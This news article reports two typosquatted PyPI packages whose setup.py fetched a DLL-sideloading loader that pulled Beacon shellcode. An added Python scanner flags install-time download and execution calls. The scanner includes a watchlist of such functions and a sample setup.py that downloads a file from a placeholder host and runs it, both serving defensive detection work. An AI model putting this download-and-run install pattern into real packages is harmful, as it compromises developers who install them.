Over 700 developers caught in typosquatting trap on PyPI

The epidemic of malicious packages calls into question the security of the supply chain.

As part of a recent study by security specialists from ReversingLabs, two malicious packages were found in the Python Package Index (PyPI) repository that used the DLL Sideloading technique to bypass detection by antivirus programs and run malicious code.

The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded by users 537 and 166 times, respectively, before being removed from the repository. These figures show that even short-lived malware packages can find their victims among developers.

The malicious packages mimic the names of legitimate ChapsVision tools used for marketing automation. This technique, called typosquatting, is very popular among attackers targeting package repositories.

Both packages contain a "setup.py" script that, on installation, downloads two files: a legitimate Kingsoft executable ("ComServer.exe") that is vulnerable to DLL sideloading, and a malicious DLL ("dgdeskband64.dll"). Because the malicious code is loaded by a legitimate executable, the technique is stealthy.

The purpose of the malicious DLL is to contact an attacker-controlled domain and download a file disguised as a GIF. In fact, this is shellcode for Beacon, a tool widely used in cyber attacks after the initial compromise of a system; it lets the operator perform a range of malicious actions, including collecting data, moving laterally across the network, and installing additional tools.
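As an added example (not code from the article or from ReversingLabs), here is a small static check for the install-time behaviour described above: it parses a setup.py with Python's ast module and flags calls that download or execute files during installation. The watchlist of call names and the sample setup.py are constructed for illustration and are not taken from the real packages.

```python
import ast

# Install-time calls a setup.py normally has no reason to make: fetching files
# from the network and running them. (Assumed watchlist; extend as needed.)
SUSPICIOUS_CALLS = {
    "urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "os.system",
    "os.startfile", "ctypes.WinDLL",
}

def _dotted_name(node):
    # Return "a.b.c" for a Name/Attribute chain, None for anything else.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def suspicious_setup_calls(source):
    """Parse setup.py source; return sorted (line, qualified call) pairs to review."""
    tree = ast.parse(source)
    aliases = {}  # local name -> imported name, e.g. {"req": "urllib.request"}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            head, _, rest = name.partition(".")
            resolved = aliases.get(head, head) + ("." + rest if rest else "")
            if resolved in SUSPICIOUS_CALLS:
                hits.append((node.lineno, resolved))
    return sorted(hits)

# Constructed sample (not the real package): the download-then-run shape.
SAMPLE_SETUP_PY = '''from setuptools import setup
import urllib.request as req
import subprocess
req.urlretrieve("https://example.invalid/payload", "loader.exe")  # placeholder
subprocess.run(["loader.exe"])
setup(name="demo")'''
```

Running `suspicious_setup_calls(SAMPLE_SETUP_PY)` reports the urlretrieve and subprocess.run lines while leaving the ordinary setup() call alone; the check is a review aid, not a verdict, since obfuscated or dynamically built calls will not match.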

ReversingLabs researchers believe that the detected packages are part of a larger campaign aimed at spreading such malicious executable files, which underlines the need for vigilance on the part of developers and organizations.

Experts emphasized that it is extremely important for development organizations to be aware of the threats associated with supply chain security and the use of open package repositories.

It is imperative to thoroughly check source code and dependencies, and to put additional monitoring and security measures in place so that, if an infection does occur, it can be detected and contained in time.

Strengthening cybersecurity and addressing threats in the software supply chain remain key challenges for organizations and developers today.